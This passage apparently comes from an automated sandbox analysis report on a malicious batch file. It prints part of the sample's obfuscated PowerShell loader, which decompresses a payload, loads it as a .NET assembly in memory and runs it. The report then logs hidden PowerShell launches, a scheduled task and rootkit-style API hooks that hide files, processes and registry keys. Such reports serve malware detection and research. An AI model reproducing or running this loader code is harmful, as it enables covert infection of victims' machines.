Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw(,$vrVB);'.Replace('uw', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose '$aohN=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw;'.Replace('uw', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$rQYH=QuNeQuw-QuObQujQuecQutQu SQuyQusQutQueQumQu.QuIOQu.CQuoQumQupQureQussQuiQuoQunQu.QuGZQuiQupQuSQutQurQueaQum($BYbD, Qu[IQuO.QuCoQumQuprQueQussQuiQuoQunQu.QuCQuoQumpQureQusQusQuiQuonQuMoQudQueQu]Qu:Qu:DQueQucQuoQumQupQureQusQus);'.Replace('Qu', ''); $rQYH.CopyTo($aohN); $rQYH.Dispose(); $BYbD.Dispose(); $aohN.Dispose(); $aohN.ToArray();}function QIGO($vrVB,$BCHx){ Invoke-Expression -Verbose -WarningAction Inquire '$lHpd=oR[SoRysoRteoRmoR.RoReoRfloReoRcoRtoRioRooRnoR.AoRssoReoRmoRboRlyoR]:oR:oRLoRooRaoRd([byte[]]$vrVB);'.Replace('oR', ''); Invoke-Expression -Debug -WarningAction Inquire '$AEjb=$lHpd.OBEnOBtrOByPOBoOBinOBt;'.Replace('OB', ''); Invoke-Expression -Debug '$AEjbR9.IR9nvR9okR9eR9($R9nR9ulR9lR9, $BCHx);'.Replace('R9', '');}function ZAB($lYat){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'vcKCVWMMyKQFoeskiSq;mNFaDYQRq;OvWrknEdQ'; Set-ItemProperty -Path $registryPath -Name 'vcKCVWMJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfileJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\more.com moreJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\findstr.exe "C:\Windows\system32\findstr.exe" /i WDS100T2B0AJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\more.comSection loaded: ulib.dllJump to behavior
        Source: C:\Windows\System32\more.comSection loaded: fsutilext.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: uy2g7z.batStatic file information: File size 6277741 > 1048576
        Source: Binary string: kernel32.pdbUGP source: winlogon.exe, 0000000D.00000003.1776106983.0000022FCEF6F000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\acrobat_sbx.pdb source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000016.00000000.1637910800.000001590D82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2706612697.000001590D82B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000016.00000000.1637910800.000001590D82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2706612697.000001590D82B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831535~1. source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorU source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdbUGP source: winlogon.exe, 0000000D.00000003.1571314943.0000022FD0980000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ~1.PDB source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000016.00000000.1637910800.000001590D82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2706612697.000001590D82B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdbUGP source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdb source: winlogon.exe, 0000000D.00000003.1571314943.0000022FD0980000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernel32.pdb source: winlogon.exe, 0000000D.00000003.1776106983.0000022FCEF6F000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831Cl source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdb source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfile
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfileJump to behavior
        Source: C:\Windows\System32\cmd.exeCode function: 3_3_000001D54F9EC62D push rcx; retf 003Fh3_3_000001D54F9EC62E
        Source: C:\Windows\System32\conhost.exeCode function: 4_3_00000281B7BAC62D push rcx; retf 003Fh4_3_00000281B7BAC62E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C77619BC pushad ; ret 5_2_00007FF7C77619C9
        Source: C:\Windows\System32\more.comCode function: 9_3_000001F66CF5C62D push rcx; retf 003Fh9_3_000001F66CF5C62E
        Source: C:\Windows\System32\winlogon.exeCode function: 13_3_0000022FCEE0C62D push rcx; retf 003Fh13_3_0000022FCEE0C62E
        Source: C:\Windows\System32\lsass.exeCode function: 14_3_0000019AB935C62D push rcx; retf 003Fh14_3_0000019AB935C62E
        Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001A53E9CC62D push rcx; retf 003Fh15_3_000001A53E9CC62E
        Source: C:\Windows\System32\dwm.exeCode function: 16_3_000002382E98C62D push rcx; retf 003Fh16_3_000002382E98C62E
        Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000027D8F4AC62D push rcx; retf 003Fh17_3_0000027D8F4AC62E
        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000001AD09E8C62D push rcx; retf 003Fh18_3_000001AD09E8C62E
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_0000020EBF9EC62D push rcx; retf 003Fh19_3_0000020EBF9EC62E
        Source: C:\Windows\System32\svchost.exeCode function: 20_3_00000229EA68C62D push rcx; retf 003Fh20_3_00000229EA68C62E
        Source: C:\Windows\System32\svchost.exeCode function: 24_3_00000276D72AC62D push rcx; retf 003Fh24_3_00000276D72AC62E
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000021D846AC62D push rcx; retf 003Fh25_3_0000021D846AC62E
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA7C62D push rcx; retf 003Fh26_2_0000025BFDA7C62E
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_000001691454C62D push rcx; retf 003Fh27_3_000001691454C62E
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$nya-CDdDgiS8Jump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | deleteJump to behavior
        Hooks files or directories query functions (used to hide files and directories)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
        Hooks processes query functions (used to hide processes)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
        Hooks registry keys query functions (used to hide registry keys)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwQueryKey
        Modifies the prolog of user mode functions (user mode inline hooks)
        Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x98 0x83 0x32 0x2D 0xDF
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-dll32Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
